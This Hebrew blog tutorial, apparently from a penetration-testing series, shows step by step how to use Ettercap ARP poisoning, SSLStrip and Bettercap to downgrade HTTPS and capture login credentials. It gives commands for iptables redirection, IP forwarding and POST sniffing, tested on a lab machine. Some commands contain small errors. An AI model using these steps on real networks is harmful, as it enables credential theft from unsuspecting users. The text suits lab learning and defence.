Home אבטחת מידעPenetration Testing - Offense ביצוע MITM בעזרת Ettercap – הפשטת SSL בעזרת SSLStrip מעודכן 2020

ביצוע MITM בעזרת Ettercap – הפשטת SSL בעזרת SSLStrip מעודכן 2020

by Tal Ben Shushan 30/05/2020 0 comment
ביצוע MITM בעזרת Ettercap – הפשטת SSL בעזרת SSLStrip מעודכן 2020
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

ביצוע MITM בעזרת Ettercap – הפשטת SSL והאזנה לרשת


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


במאמר זה נשתמש 3 כלים:

Ettercap – יבצע את ה MITM, הוא יחליף את כתובת ה MAC של הDefault Gateway במטרה שלנו
גם Ettercap מבצע Sniffing אבל לא תמיד עובד…

SSLstrip – כלי להפשטת ה SSL (יותר נכון הTLS) מאתרי אינטרנט שהמטרה נכנסת אליהם.

EtterCap

ניגש ל Application -> Sniffing And Spoofing – > Ettercap

נוריד את הסימון של Sniffing at startup ונלחץ על הV

נלחץ על החיפוש בצד שמאל ואז על כפתור ה Hosts שלידו

לאחר מכן נלחץ על Add To target 1

כעת נלחץ על כפתור MITM Option ואז ARP Poisoning

כעת נלחץ על כפתור הPlay שבצד הכי שמאלי

כעת נוכל להבחין שכתובת ה MAC Address של קאלי ושל הDefault Gateway הוא זהה

הפקודה בCMD היא

arp -a

כעת אתחבר לאתר http ואנסה להתחבר עם שם משתמש וסיסמא

נוכל להבחין שEttercap “תפס” את המידע כולל שם המשתמש והסיסמא וכתובת האתר

 

SSLStrip

על מנת להתקין ב Kali 2020 את SSLstrip נתקין תחילה PIP

sudo apt install python-pip -y

כעת נתקין את SSLstrip (דרישות)

sudo git clone https://github.com/robertpro/sslstrip
sudo cd sslstrip
sudo pip install -r requirements.txt

כעת נתקין את SSLstrip

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py build && python setup.py install

נגדיר Redirect מפורט 80 ל 7777

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

נגדיר שמותר לבצע Ip Forward

echo "1" > /proc/sys/net/ipv4/ip_forward

כעת נפעיל את SSLstrip

sslstrip -l 7777

כעת נכנסתי לגוגל ובחרתי אתר להתחברות למייל (דיי רנדומלי)

לאחר שהתחברתי הועברתי מhttps ל http

וניתן להבחין שEttercap תפרס את השם משתמש והסיסמא

 

Bettercap – זו גרסה ישנה של Bettercap ולכן תאלצו להוריד את הגרסה הזו על מנת לבצע מדריך זה

כמו שהסברתי למעלה, השימוש מעולה מעולה עקב כך שהוא מבצע Sniffing וגם SSLstrip ובכך מקל על איסוף המידע

*בדקו מעבדה זו על Windows 7

נתקין את החבילות

sudo apt-get install build-essential ruby-dev libpcap-dev

נוריד Bettercap

aptget update

aptget install bettercap

נתקין על ידי Gem

gem install bettercap

נבצע עדכון

gem update bettercap

בסיום נקיש

bettercap -T 192.168.31.150 --proxy -P POST

פקודה זו אומרת שהכתובת אותה אנו רוצים לבצע Sniffing וגם SSLstrip, ולקבל את המידע שמוקש בדפדפן רק בתגית Post ובכך יכוון לסיסמאות ושמות משתמשים

נכנס כעת ב 192.168.1.150 במחשב Windows 7 לפייסבוק, נראה כי הוא שונה

הסיבה היא SSLstrip שהפשיט את ה SSL מהאתר

נקיש סתם משתמש וסיסמא

וב Bettercap נוכל להבחין בשם משתמש והסיסמא שהוקש

מאמרים קשורים

Leave a Comment